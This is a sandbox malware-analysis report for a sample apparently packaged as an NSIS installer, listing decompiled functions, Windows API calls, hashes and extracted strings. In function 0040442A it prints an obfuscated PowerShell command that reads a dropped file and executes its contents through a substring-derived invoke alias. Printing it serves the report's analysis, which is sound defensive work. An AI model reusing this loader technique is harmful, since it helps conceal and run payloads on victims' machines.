Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd

Similarity

API ID: PathSearch
String ID:
API String ID: 2203818243-0
Opcode ID: f45795dd4039b4ac79c1b788fb08f03ac0000c29c4d50ab2925c178598d74e3b
Instruction ID: b1e2324c8c43f12db9182c34506a8a6b6d03d1e685c93adb476f6fabe5cadde0
Opcode Fuzzy Hash: f45795dd4039b4ac79c1b788fb08f03ac0000c29c4d50ab2925c178598d74e3b
Instruction Fuzzy Hash: 3CE0DFB2204100BBD740DB649D48AAB77A8EB10368F20863AE511E60C0E2B99902E229

Function 00402B07 Relevance: 1.5, APIs: 1, Instructions: 22registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B2F

Memory Dump Source

Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: ebfeba3ed9c8d95cb46d76ca19a6c1a04daa5e79448631d0a062a8db0bedbb5d
Instruction ID: 087740a894708ae54e311fe38564fcb001a0ed9e3d0f4d4a62d19f1d4de25a1d
Opcode Fuzzy Hash: ebfeba3ed9c8d95cb46d76ca19a6c1a04daa5e79448631d0a062a8db0bedbb5d
Instruction Fuzzy Hash: 38E046B6250108AADB40EFA4EE4AF9537ECFB04700F008021BA08E7091CA78E5509B69

Function 004059FA Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00409130,00000000,00000000,00000000,00000000,004128A0,0040A8A0,004031C9,00409130,00409130,004030BB,004128A0,00004000,?,00000000,?), ref: 00405A0E

Memory Dump Source

Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 36ce21e0183dc59356ed1b7b138b7ffe2bb5c4fd6ccae5392a8977301763c5ee
Instruction ID: b1acdbea0b5305796381949641a39caa05877223dc774253bf026a704a199e6f
Opcode Fuzzy Hash: 36ce21e0183dc59356ed1b7b138b7ffe2bb5c4fd6ccae5392a8977301763c5ee
Instruction Fuzzy Hash: 3AE0E632714159ABDF109E559C41FEB779CEF05350F044532F915E6150E231E8219FA5

Function 00401595 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A0

Memory Dump Source

Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 517c991728b4920fe6c9b853d4cb973a6b5d17c3594e599704a440defafe000c
Instruction ID: bed2877986d8c12a83e01492d596720214e57a472dec7050afa6ab6fccae40cd
Opcode Fuzzy Hash: 517c991728b4920fe6c9b853d4cb973a6b5d17c3594e599704a440defafe000c
Instruction Fuzzy Hash: 17D01277B08114E7DB00DBB5AE48A9E73A4FB50325F208637D111F11D0D3B98551A629

Function 00404038 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(000103E4,00000000,00000000,00000000), ref: 0040404A

Memory Dump Source

Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 875450fc840247aea6e73403ee44149e02d5474b467ece0a28835bfda1230da9
Instruction ID: af7fd4c3fc1dda8ad1a195a9021ea177fcc43fc0d0bb539f8953ea950d20d41d
Opcode Fuzzy Hash: 875450fc840247aea6e73403ee44149e02d5474b467ece0a28835bfda1230da9
Instruction Fuzzy Hash: DFC09B717443007BEA31DB509D49F077758A750B00F5584357320F50D0C6B4F451D62D

Function 00404021 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(00000028,?,00000001,00403E52), ref: 0040402F

Memory Dump Source

Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 3bdb3c033a7d800f3f5983e71921b41162ac414239058931643885a1338ef954
Instruction ID: 7b5ccc39adf6f72de5191684d4495c6b43ffe58f78915606d69c4a7e6f44d702
Opcode Fuzzy Hash: 3bdb3c033a7d800f3f5983e71921b41162ac414239058931643885a1338ef954
Instruction Fuzzy Hash: F3B092B5684200BAEE224B40DD09F457EA2E7A4702F008024B300240B0C6B200A1DB19

Function 004031CC Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402EA4,?), ref: 004031DA

Memory Dump Source

Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
Instruction ID: 49fdcfdf8b1973cd13611e97ba0bfafd8618b6cb304eeeee9131019f9f046fb0
Opcode Fuzzy Hash: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
Instruction Fuzzy Hash: 03B01271644200BFDA214F00DF05F057B21A790700F10C030B748380F082712420EB4D

Function 0040400E Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,00403DEB), ref: 00404018

Memory Dump Source

Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: caaff2729d3fe7bae5ae998927534049a5cfce9e2193b3926e4c56a419af128c
Instruction ID: f87940b9544c4de7e657a104dd6f20edac94ef916c9b89b279468f5034d51d6a
Opcode Fuzzy Hash: caaff2729d3fe7bae5ae998927534049a5cfce9e2193b3926e4c56a419af128c
Instruction Fuzzy Hash: E2A01231404001DBCB014B10DF04C45FF21B7503007018030E50140034C6310420FF09

Non-executed Functions

Function 00404959 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404971
GetDlgItem.USER32(?,00000408), ref: 0040497C
GlobalAlloc.KERNEL32(00000040,?), ref: 004049C6
LoadBitmapA.USER32(0000006E), ref: 004049D9
SetWindowLongA.USER32(?,000000FC,00404F50), ref: 004049F2
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A06
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404A18
SendMessageA.USER32(?,00001109,00000002), ref: 00404A2E
SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404A3A
SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404A4C
DeleteObject.GDI32(00000000), ref: 00404A4F
SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404A7A
SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404A86
SendMessageA.USER32(?,00001100,00000000,?), ref: 00404B1B
SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404B46
SendMessageA.USER32(?,00001100,00000000,?), ref: 00404B5A
GetWindowLongA.USER32(?,000000F0), ref: 00404B89
SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404B97
ShowWindow.USER32(?,00000005), ref: 00404BA8
SendMessageA.USER32(?,00000419,00000000,?), ref: 00404CA5
SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404D0A
SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404D1F
SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404D43
SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404D63
ImageList_Destroy.COMCTL32(00000000), ref: 00404D78
GlobalFree.KERNEL32(00000000), ref: 00404D88
SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404E01
SendMessageA.USER32(?,00001102,?,?), ref: 00404EAA
SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404EB9
InvalidateRect.USER32(?,00000000,00000001), ref: 00404ED9
ShowWindow.USER32(?,00000000), ref: 00404F27
GetDlgItem.USER32(?,000003FE), ref: 00404F32
ShowWindow.USER32(00000000), ref: 00404F39

Strings

, xrefs: 00404F11
M, xrefs: 00404B02
N, xrefs: 00404BE3

Memory Dump Source

Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: 053b7ab7fa00b04d0007377cc01b8b92edfe404da863458ea4911086e25be11d
Instruction ID: 292d5c244ab645820c7f02bed8ff3f2a610eed88cba0887a0da166436049191d
Opcode Fuzzy Hash: 053b7ab7fa00b04d0007377cc01b8b92edfe404da863458ea4911086e25be11d
Instruction Fuzzy Hash: A10250B0900209AFEF109F54DC85AAE7BB5FB84315F10817AFA11B62E1D7789E42DF58

Function 0040442A Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 264stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 00404479
SetWindowTextA.USER32(00000000,?), ref: 004044A3
SHBrowseForFolderA.SHELL32(?,0041F0D0,?), ref: 00404554
CoTaskMemFree.OLE32(00000000), ref: 0040455F
lstrcmpiA.KERNEL32(004226A0,reckling: Installing), ref: 00404591
lstrcatA.KERNEL32(?,004226A0), ref: 0040459D
SetDlgItemTextA.USER32(?,000003FB,?), ref: 004045AF

Part of subcall function 004054E9: GetDlgItemTextA.USER32(?,?,00000400,004045E6), ref: 004054FC

Part of subcall function 00405F5C: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\ulf4JrCRk2.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,76F93410,004033C9), ref: 00405FB4
Part of subcall function 00405F5C: CharNextA.USER32(?,?,?,00000000), ref: 00405FC1
Part of subcall function 00405F5C: CharNextA.USER32(?,"C:\Users\user\Desktop\ulf4JrCRk2.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,76F93410,004033C9), ref: 00405FC6
Part of subcall function 00405F5C: CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,76F93410,004033C9), ref: 00405FD6

GetDiskFreeSpaceA.KERNEL32(0041ECC8,?,?,0000040F,?,0041ECC8,0041ECC8,?,00000000,0041ECC8,?,?,000003FB,?), ref: 0040466A
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404685
SetDlgItemTextA.USER32(00000000,00000400,0041ECB8), ref: 004046FE

Strings

C:\Users\user\AppData\Roaming\supersystem\panelet, xrefs: 0040457A
reckling: Installing, xrefs: 00404527, 0040458A
"Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) , xrefs: 00404443
A, xrefs: 0040454D

Memory Dump Source

Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
String ID: "Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) $A$C:\Users\user\AppData\Roaming\supersystem\panelet$reckling: Installing
API String ID: 2246997448-2451307729
Opcode ID: 476c68135541f7995d7e7312d009b35f143366a4d6393fc4d548ff83450bdccd
Instruction ID: 255f07ea732f9d77aa63c61f9e9bd72d052a515538c5e386bff86aa800b3dd0f
Opcode Fuzzy Hash: 476c68135541f7995d7e7312d009b35f143366a4d6393fc4d548ff83450bdccd
Instruction Fuzzy Hash: 5A9172B1900219BBDB11AFA1CD85AAF76B8EF85304F10843BFB01B72D1D77C99418B69

Function 00402036 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00407384,?,00000001,00407374,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040208B
MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00407374,?,?), ref: 00402143

Strings

C:\Users\user\AppData\Roaming\supersystem\panelet, xrefs: 004020CB

Memory Dump Source

Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd

Similarity

API ID: ByteCharCreateInstanceMultiWide
String ID: C:\Users\user\AppData\Roaming\supersystem\panelet
API String ID: 123533781-2983365704
Opcode ID: 844d7db231ce930ba87aa91d55221135eb66824421c535283c4cff4e72d9e9e5
Instruction ID: 8923a1fbb4e768f6885cfedd98bdb4ab1c3b58066d3a845fdfa0f70482a78e56
Opcode Fuzzy Hash: 844d7db231ce930ba87aa91d55221135eb66824421c535283c4cff4e72d9e9e5
Instruction Fuzzy Hash: 02416D71A00209BFCB40DFA4CE88E9E7BB5BF48354B2042A9F911FB2D1D6799D41DB54

Function 00404135 Relevance: 38.7, APIs: 20, Strings: 2, Instructions: 205windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 004041C0
GetDlgItem.USER32(00000000,000003E8), ref: 004041D4
SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 004041F2
GetSysColor.USER32(?), ref: 00404203
SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404212
SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404221
lstrlenA.KERNEL32(?), ref: 00404224
SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404233
SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404248
GetDlgItem.USER32(?,0000040A), ref: 004042AA
SendMessageA.USER32(00000000), ref: 004042AD
GetDlgItem.USER32(?,000003E8), ref: 004042D8
SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404318
LoadCursorA.USER32(00000000,00007F02), ref: 00404327
SetCursor.USER32(00000000), ref: 00404330
ShellExecuteA.SHELL32(0000070B,open,004226A0,00000000,00000000,00000001), ref: 00404343
LoadCursorA.USER32(00000000,00007F00), ref: 00404350
SetCursor.USER32(00000000), ref: 00404353
SendMessageA.USER32(00000111,00000001,00000000), ref: 0040437F
SendMessageA.USER32(00000010,00000000,00000000), ref: 00404393

Strings

open, xrefs: 0040433B
N, xrefs: 004042C6

Memory Dump Source

Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
String ID: N$open
API String ID: 3615053054-904208323
Opcode ID: aa854a75b9a8ef41e2656ff54a1ab69c816baf86c41e2f577b142ace3155aca6
Instruction ID: e12ca537bcd72e8a05bc460f10c87f41301461b9037796019f3247b39f6fe1bc
Opcode Fuzzy Hash: aa854a75b9a8ef41e2656ff54a1ab69c816baf86c41e2f577b142ace3155aca6
Instruction Fuzzy Hash: 9361A0B1A40209BFEB109F61DD45F6A7B69FB84704F108026FB04BB2D1C7B8A951CB99

Function 00405A29 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 136stringmemoryfileCOMMON

Download Yara Rule

APIs

lstrcpyA.KERNEL32(00421A88,NUL,?,00000000,?,00000000,?,00405BCD,?,?,00000001,00405770,?,00000000,000000F1,?), ref: 00405A39
CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,00000000,?,00405BCD,?,?,00000001,00405770,?,00000000,000000F1,?), ref: 00405A5D
GetShortPathNameA.KERNEL32(00000000,00421A88,00000400), ref: 00405A66

Part of subcall function 004058E7: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B16,00000000,[Rename],00000000,00000000,00000000), ref: 004058F7
Part of subcall function 004058E7: lstrlenA.KERNEL32(00405B16,?,00000000,00405B16,00000000,[Rename],00000000,00000000,00000000), ref: 00405929

GetShortPathNameA.KERNEL32(?,00421E88,00000400), ref: 00405A83
wsprintfA.USER32 ref: 00405AA1
GetFileSize.KERNEL32(00000000,00000000,00421E88,C0000000,00000004,00421E88,?,?,?,?,?), ref: 00405ADC
GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405AEB
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405B23
SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00421688,00000000,-0000000A,004093A0,00000000,[Rename],00000000,00000000,00000000), ref: 00405B79
WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405B8B
GlobalFree.KERNEL32(00000000), ref: 00405B92
CloseHandle.KERNEL32(00000000), ref: 00405B99

Part of subcall function 00405982: GetFileAttributesA.KERNELBASE(00000003,00402CBC,C:\Users\user\Desktop\ulf4JrCRk2.exe,80000000,00000003), ref: 00405986
Part of subcall function 00405982: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059A8

Strings

%s=%s, xrefs: 00405A97
[Rename], xrefs: 00405B0B, 00405B1D
NUL, xrefs: 00405A33

Memory Dump Source

Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

